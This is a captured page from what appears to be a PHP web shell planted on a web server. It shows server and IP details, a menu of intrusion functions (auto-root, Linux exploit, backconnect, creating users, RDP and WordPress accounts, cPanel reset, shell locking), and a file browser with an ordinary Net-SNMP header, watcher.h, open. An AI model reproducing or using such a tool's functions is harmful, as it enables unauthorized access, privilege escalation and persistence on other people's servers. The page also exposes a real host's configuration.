Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
include /
net-snmp /
agent /
[ HOME SHELL ]
Name
Size
Permission
Action
util_funcs
[ DIR ]
drwxr-xr-x
agent_callbacks.h
801
B
-rw-r--r--
agent_handler.h
11.3
KB
-rw-r--r--
agent_index.h
1.49
KB
-rw-r--r--
agent_module_config.h
1.23
KB
-rw-r--r--
agent_read_config.h
1.19
KB
-rw-r--r--
agent_registry.h
5.86
KB
-rw-r--r--
agent_sysORTable.h
869
B
-rw-r--r--
agent_trap.h
2.37
KB
-rw-r--r--
all_helpers.h
1.19
KB
-rw-r--r--
auto_nlist.h
605
B
-rw-r--r--
baby_steps.h
3.4
KB
-rw-r--r--
bulk_to_next.h
563
B
-rw-r--r--
cache_handler.h
4.62
KB
-rw-r--r--
debug_handler.h
328
B
-rw-r--r--
ds_agent.h
3.77
KB
-rw-r--r--
instance.h
6.12
KB
-rw-r--r--
mfd.h
2.62
KB
-rw-r--r--
mib_module_config.h
34.89
KB
-rw-r--r--
mib_module_includes.h
14.06
KB
-rw-r--r--
mib_modules.h
428
B
-rw-r--r--
mode_end_call.h
871
B
-rw-r--r--
multiplexer.h
975
B
-rw-r--r--
net-snmp-agent-includes.h
756
B
-rw-r--r--
null.h
464
B
-rw-r--r--
old_api.h
1.39
KB
-rw-r--r--
read_only.h
540
B
-rw-r--r--
row_merge.h
1.32
KB
-rw-r--r--
scalar.h
783
B
-rw-r--r--
scalar_group.h
983
B
-rw-r--r--
serialize.h
600
B
-rw-r--r--
set_helper.h
542
B
-rw-r--r--
snmp_agent.h
11.89
KB
-rw-r--r--
snmp_get_statistic.h
836
B
-rw-r--r--
snmp_vars.h
4.58
KB
-rw-r--r--
stash_cache.h
1.4
KB
-rw-r--r--
stash_to_next.h
377
B
-rw-r--r--
struct.h
917
B
-rw-r--r--
sysORTable.h
2.4
KB
-rw-r--r--
table.h
7.34
KB
-rw-r--r--
table_array.h
5.33
KB
-rw-r--r--
table_container.h
3.96
KB
-rw-r--r--
table_data.h
5.47
KB
-rw-r--r--
table_dataset.h
7.73
KB
-rw-r--r--
table_iterator.h
6.76
KB
-rw-r--r--
table_tdata.h
6.54
KB
-rw-r--r--
util_funcs.h
3.24
KB
-rw-r--r--
var_struct.h
4.91
KB
-rw-r--r--
watcher.h
5.43
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : watcher.h
/* * watcher.h */ #ifndef NETSNMP_WATCHER_H #define NETSNMP_WATCHER_H #ifdef __cplusplus extern "C" { #endif /** @ingroup watcher * @{ */ /* * if handler flag has this bit set, the timestamp will be * treated as a pointer to the timestamp. If this bit is * not set (the default), the timestamp is a struct timeval * that must be compared to the agent starttime. */ #define NETSNMP_WATCHER_DIRECT MIB_HANDLER_CUSTOM1 /** The size of the watched object is constant. * @hideinitializer */ #define WATCHER_FIXED_SIZE 0x01 /** The maximum size of the watched object is stored in max_size. * If WATCHER_SIZE_STRLEN is set then it is supposed that max_size + 1 * bytes could be stored in the buffer. * @hideinitializer */ #define WATCHER_MAX_SIZE 0x02 /** If set then the variable data_size_p points to is supposed to hold the * current size of the watched object and will be updated on writes. * @hideinitializer * @since Net-SNMP 5.5 */ #define WATCHER_SIZE_IS_PTR 0x04 /** If set then data is suppposed to be a zero-terminated character array * and both data_size and data_size_p are ignored. Additionally \\0 is a * forbidden character in the data set. * @hideinitializer * @since Net-SNMP 5.5 */ #define WATCHER_SIZE_STRLEN 0x08 /** If set then size is in units of object identifiers. * This is useful if you have an OID and tracks the OID_LENGTH of it as * opposed to it's size. * @hideinitializer * @since Net-SNMP 5.5.1 */ #define WATCHER_SIZE_UNIT_OIDS 0x10 typedef struct netsnmp_watcher_info_s { void *data; size_t data_size; size_t max_size; u_char type; int flags; size_t *data_size_p; } netsnmp_watcher_info; /** @} */ int netsnmp_register_watched_instance( netsnmp_handler_registration *reginfo, netsnmp_watcher_info *winfo); int netsnmp_register_watched_instance2(netsnmp_handler_registration *reginfo, netsnmp_watcher_info *winfo); int netsnmp_register_watched_scalar( netsnmp_handler_registration *reginfo, netsnmp_watcher_info *winfo); int netsnmp_register_watched_scalar2( netsnmp_handler_registration *reginfo, netsnmp_watcher_info *winfo); int netsnmp_register_watched_timestamp(netsnmp_handler_registration *reginfo, marker_t timestamp); int netsnmp_watched_timestamp_register(netsnmp_mib_handler *whandler, netsnmp_handler_registration *reginfo, marker_t timestamp); int netsnmp_register_watched_spinlock(netsnmp_handler_registration *reginfo, int *spinlock); /* * Convenience registration calls */ int netsnmp_register_ulong_scalar(const char *name, const oid * reg_oid, size_t reg_oid_len, u_long * it, Netsnmp_Node_Handler * subhandler); int netsnmp_register_read_only_ulong_scalar(const char *name, const oid * reg_oid, size_t reg_oid_len, u_long * it, Netsnmp_Node_Handler * subhandler); int netsnmp_register_long_scalar(const char *name, const oid * reg_oid, size_t reg_oid_len, long * it, Netsnmp_Node_Handler * subhandler); int netsnmp_register_read_only_long_scalar(const char *name, const oid * reg_oid, size_t reg_oid_len, long * it, Netsnmp_Node_Handler * subhandler); int netsnmp_register_int_scalar(const char *name, const oid * reg_oid, size_t reg_oid_len, int * it, Netsnmp_Node_Handler * subhandler); int netsnmp_register_read_only_int_scalar(const char *name, const oid * reg_oid, size_t reg_oid_len, int * it, Netsnmp_Node_Handler * subhandler); int netsnmp_register_read_only_counter32_scalar(const char *name, const oid * reg_oid, size_t reg_oid_len, u_long * it, Netsnmp_Node_Handler * subhandler); #define WATCHER_HANDLER_NAME "watcher" netsnmp_mib_handler *netsnmp_get_watcher_handler(void); netsnmp_watcher_info * netsnmp_init_watcher_info(netsnmp_watcher_info *, void *, size_t, u_char, int); netsnmp_watcher_info * netsnmp_init_watcher_info6(netsnmp_watcher_info *, void *, size_t, u_char, int, size_t, size_t*); netsnmp_watcher_info * netsnmp_create_watcher_info(void *, size_t, u_char, int); netsnmp_watcher_info * netsnmp_create_watcher_info6(void *, size_t, u_char, int, size_t, size_t*); netsnmp_watcher_info * netsnmp_clone_watcher_info(netsnmp_watcher_info *winfo); void netsnmp_owns_watcher_info(netsnmp_mib_handler *handler); Netsnmp_Node_Handler netsnmp_watcher_helper_handler; netsnmp_mib_handler *netsnmp_get_watched_timestamp_handler(void); Netsnmp_Node_Handler netsnmp_watched_timestamp_handler; netsnmp_mib_handler *netsnmp_get_watched_spinlock_handler(void); Netsnmp_Node_Handler netsnmp_watched_spinlock_handler; #ifdef __cplusplus } #endif #endif /** NETSNMP_WATCHER_H */
Close